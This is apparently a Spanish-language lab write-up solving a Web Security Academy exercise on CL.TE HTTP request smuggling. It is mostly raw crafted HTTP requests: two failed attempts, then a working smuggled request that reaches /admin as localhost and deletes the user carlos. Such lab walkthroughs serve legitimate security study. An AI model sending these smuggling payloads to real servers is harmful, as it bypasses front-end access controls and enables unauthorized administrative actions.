06 - Exploiting HTTP request smuggling to bypass front-end security controls, CL.TE vulnerability

Así nos tira 401 Unauthorized - Admin interface only available to local users :

POST / HTTP/1.1\r\n
Host: 0a97002803ea466780098fc60048004f.web-security-academy.net\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 29\r\n
Transfer-Encoding: chunked\r\n
\r\n
0\r\n
\r\n
GET /admin HTTP/1.1\r\n
X-Ignore: X

Así nos tira 400 Duplicate header names are not allowed (porque en la segunda petición habría dos Host Headers) :

POST / HTTP/1.1\r\n
Host: 0a2800630360d96281b525e60080002c.web-security-academy.net\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 54\r\n
Transfer-Encoding: chunked\r\n
\r\n
0\r\n
\r\n
GET /admin HTTP/1.1\r\n
Host: localhost\r\n
X-Ignore: X

El payload que funcionará es el siguiente, porque así la petición normal que se concatene con esta, formará parte del body :

(El content-length tiene que ser length(x=) +1 && >6 , osea que en este caso tiene que ser 6)

POST /admin HTTP/1.1\r\n
Host: localhost\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 6\r\n
\r\n
x=

Quedará así la segunda petición solicitada

POST /admin HTTP/1.1\r\n
Host: localhost\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 6\r\n
\r\n
x=POST / HTTP/1.1\r\n
Host: 0a2800630360d96281b525e60080002c.web-security-academy.net\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 116\r\n
Transfer-Encoding: chunked\r\n

El lab se resolvería con :

POST / HTTP/1.1
Host: 0a2800630360d96281b525e60080002c.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 139
Transfer-Encoding: chunked

0

POST /admin/delete?username=carlos HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 6

x=